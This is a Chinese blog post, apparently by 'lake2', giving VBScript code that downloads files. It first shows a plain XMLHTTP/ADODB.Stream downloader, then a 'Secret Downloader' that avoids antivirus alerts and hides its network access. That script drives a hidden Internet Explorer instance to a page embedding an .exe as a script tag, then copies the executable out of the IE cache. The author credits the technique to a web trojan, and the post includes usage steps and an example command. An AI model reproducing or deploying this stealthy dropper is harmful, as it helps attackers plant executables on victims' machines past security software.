`
hereson2
  • 浏览: 462378 次
  • 性别: Icon_minigender_1
  • 来自: 广州
社区版块
存档分类
最新评论

使用vbs下载文件

IEMicrosoft脚本WindowsCache 
阅读更多
使用vbs下载文件
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2

当你把这段代码保存为vbs的时候,杀毒软件可能就开始报警了;而且使用中cscript.exe会访问网络,不太隐蔽。
那么,有没有更好的方法呢?答案很明显:-)
我们可以利用一个叫InternetExplorer.Application的对象(其实就是个IE啦)下载文件。但是貌似这个组件不能直接下载保存文件,只好曲线救国了。因为IE是把文件下载到本地缓存的,我们可以让IE组件先把文件下载到缓存,然后再从缓存找到并copy至我们需要保存的位置。其实这个思路是从一个网马看到的:)
为了让IE把我们的exe文件下载到本地缓存,我们需要有一个网页把exe文件包含进去。比如:<script src="520.exe"></script>。这样当IE访问该页面的时候就会把520.exe当成js脚本保存到本地缓存了。保存的命名一般是520[1].exe,IE临时文件的位置可以从注册表键值 HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\paths\Directory 中读取。
好了,不废话,看代码:

'=============================
' get.vbs
' by lake2
'=============================

If WScript.Arguments.Count <> 3 Then
WScript.Echo ""
WScript.Echo "======= The Secret Downloader 0.1 ================"
WScript.Echo " by lake2 "
WScript.Echo "Usage: CScript /nologo" & WScript.ScriptName & " [URL] [RemoteName] [LocalFile]"
WScript.Echo "Example: CScript /nologo" & WScript.ScriptName & "http://www.0x54.org/lake.htm 520.exe c:\520.exe"
WScript.Echo "=================================================="
WScript.Quit
End If

URL = WScript.Arguments(0)
exeName = WScript.Arguments(1)
If InStr(exeName, ".") > 0 Then
tmp = Left(exeName,InStrRev(exeName, ".")-1)
tmp2 = Right(exeName,Len(exeName) - InStrRev(exeName, ".") + 1)
FindFileName = tmp & "[1]" & tmp2
End If
LocalName = WScript.Arguments(2)

set ie=wscript.createobject("internetexplorer.application")
ie.visible = 0
ie.navigate URL

WScript.Echo "[+]Create and Exec IE to your HTTP Server ..."
WScript.Sleep(5000)
ie.quit
WScript.Echo "[+]Get the file ..."
set objshell= WScript.Createobject("WScript.Shell")
strValue = objshell.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\paths\Directory")
ShowAllFile(strValue)
WScript.Echo "[-]download Fail"

Sub ShowAllFile(Path)
Set FSO = CreateObject("Scripting.FileSystemObject")
Set f = FSO.GetFolder(Path)
Set fc = f.SubFolders
For Each f1 in fc
If FSO.FileExists(path&"\"&f1.name&"\"&FindFileName) Then
FSO.CopyFile path&"\"&f1.name&"\"&FindFileName, LocalName
WScript.Echo "[+]Download Success !"
WScript.Quit
End If
ShowAllFile path&"\"&f1.name
Next
Set FSO = Nothing
End Sub

使用方法:
1、在你的web目录放上一个htm文件,内容包含要下载的文件。如:<script src=520.exe></script>
2、CScript get.vbs 第一步的网页URL 网页包含的文件名 本地保存路径

例子:CScript get.vbshttp://www.0x54.org/lake2/get.htm whoami.exe c:\who.exe

PS:脚本使用了5秒钟作为下载文件的时间,可以改成等待下载完毕再继续的,不过基本上够用,懒得改了-_-
分享到:
| 如何用VB制作半透明窗体?
评论
发表评论

您还没有登录,请您登录后再发表评论

相关推荐

    使用vbs下载文件.pdf

    ### 使用VBS下载文件的关键知识点 #### 一、VBS(Visual Basic Script Edition)简介 VBS,全称为Visual Basic Script Edition,是一种轻量级的编程语言,基于Microsoft的Visual Basic编程环境。它主要应用于...

    西门子WinCC 如何使用 VBS 调用文件打开对话框.pdf

    本文档提供了详细的操作指南,用于在西门子WinCC环境下使用VBS调用文件打开对话框。 首先,文档描述了测试环境,明确指出系统环境为Windows XP SP3和Internet Explorer 6.0 SP3。在这样的环境下,作者详细阐述了...

    使用vbs读写文件(Adodb.Stream)方式

    使用vbs读写文件(Adodb.Stream)方式,防止乱码

    使用vbs下载文件的代码加强版

    该文档介绍了一种使用VBScript(VBS)脚本来下载文件并保存到本地的方法,同时尝试绕过杀毒软件的检测。VBScript是一种轻量级的脚本语言,通常用于Windows环境下实现自动化任务。在这篇指南中,作者Lake2分享了一种...

    VBS下载文件的新方法

    因此,在使用VBS脚本进行文件下载时,用户应该警惕来源不明的脚本,并确保运行的脚本来自可信的来源。 ### 结论 VBS下载文件的新方法展示了VBS脚本强大的灵活性以及CDO组件的多功能性。通过合理利用这些技术,可以...

    wincc中使用VBS脚本读写SQLServer数据库文件

    wincc中使用VBS脚本读写SQLServer数据库文件

    wincc使用VBS操作趋势曲线.docx

    这个文件提供了两个示例,第一个示例演示如何使用 VBS 脚本来操作趋势曲线,包括删除和添加趋势曲线,并且更改曲线名称和颜色。第二个示例演示如何使用 VBS 脚本来实现个人需求,例如根据用户选择的参数来创建多个...

    wps的vbs安装文件.rar

    安装VBA宏模块的过程相对简单,用户只需下载提供的压缩文件,解压后找到".exe"可执行文件,双击运行即可启动安装程序。安装过程中,系统会按照步骤引导用户进行,包括接受许可协议、选择安装路径、等待安装进度完成...

    vbs脚本文件简明教程

    2. **广泛的应用场景:** VBS 可以用于多种场合,如日常维护、批量处理 Word 文档等。 3. **强大的功能:** VBS 支持调用 COM 对象,这意味着它可以与 Windows 上几乎所有组件进行交互。 4. **无需安装额外软件:** ...

    vbs版移动文件

    在“vbs版移动文件”这个场景中,我们关注的是如何使用VBS来移动文件,并通过CMD命令行调用执行。下面将详细阐述VBS移动文件的基本原理、代码实现以及如何读取路径参数。 1. VBS移动文件的基本概念: 在VBS中,我们...

    微软官方VBS脚本手册.zip

    6. **XML处理**:VBS可以使用MSXML库处理XML文档,如创建、解析和修改XML。DOM(Document Object Model)模型是其中的核心概念。 7. **正则表达式**:VBS提供了RegEx对象,用于执行复杂的字符串匹配和替换,这对于...

    按键精灵VBS经典脚本教程

    1. 文件下载(无回显):使用VBS脚本可以实现文件下载,并且不显示下载过程。 2. 列举进程:使用VBS脚本可以列举系统中的进程。 3. 终止进程:使用VBS脚本可以终止系统中的进程。 4. 重启系统:使用VBS脚本可以重启...

    IIsCnfg.vbs下载

    在这个列表中,只有一个文件IIsCnfg.vbs,这通常意味着用户下载的内容就是一个单独的脚本文件。此脚本可能包含了一系列的VBScript命令和函数,用于执行与IIS相关的管理操作。使用时,用户可能需要通过命令行或者...

    VBS转EXE工具.rar

    1. "help.chm" 是一个帮助文档,通常包含了软件的使用指南、功能介绍和常见问题解答,用户可以通过阅读这个文件来学习如何使用VBS转EXE工具。 2. "Vbs_To_Exe_(x64).exe" 和 "Vbs_To_Exe.exe" 可能是工具的两个版本...

    将vbs文件转换为bat文件

    用户只需运行该程序,然后指定VBS文件的路径,它就会自动生成对应的BAT文件。此工具简化了手动转换的过程,提高了效率。 2. **强制删除[2].exe**:这个文件可能是一个辅助工具,用于强制删除无法通过常规方式删除的...

    登录使用vbs文件调用bat格式的其他模块儿

    标题中的“登录使用vbs文件调用bat格式的其他模块儿”揭示了这是一个关于系统登录过程的实现方式,其中利用了Visual Basic Script (VBS) 和Batch(BAT)脚本技术。VBS是一种脚本语言,常用于Windows环境中执行自动化...

    VBS生成文件MD5

    通过这种方式,你可以利用VBS方便地自动化计算大量文件的MD5值,这对于批量检查文件一致性、校验软件下载完整性等方面非常有用。然而,需要注意的是,MD5算法存在碰撞风险,即不同的数据可能产生相同的MD5值,因此在...

    VBS帮助文档

    VBS帮助文档的CHM文件通常会按照这些主题进行详细划分,提供实例代码和解释,帮助初学者快速上手并解决实际问题。通过深入阅读和实践,你可以逐渐熟练掌握VBS,从而编写出高效、实用的脚本来实现各种自动化任务。

    VBS读写及创建、删除文件

    在VBS中,读写文件可以使用FileSystemObject对象。首先,需要创建一个FileSystemObject对象,然后使用OpenTextFile方法打开文件。OpenTextFile方法有两个参数,第一个参数是文件名,第二个参数是打开文件的模式(1为...

    VBS读写文件及创建、删除文件

    VBS 读写文件及创建、删除文件 VBS(Visual Basic Scripting Edition)是一种脚本语言,广泛应用于Windows操作系统中。VBS脚本可以创建、读写文件、删除文件、创建文件夹、删除文件夹等文件管理操作。下面是VBS读写...

Magicbox
Global site tag (gtag.js) - Google Analytics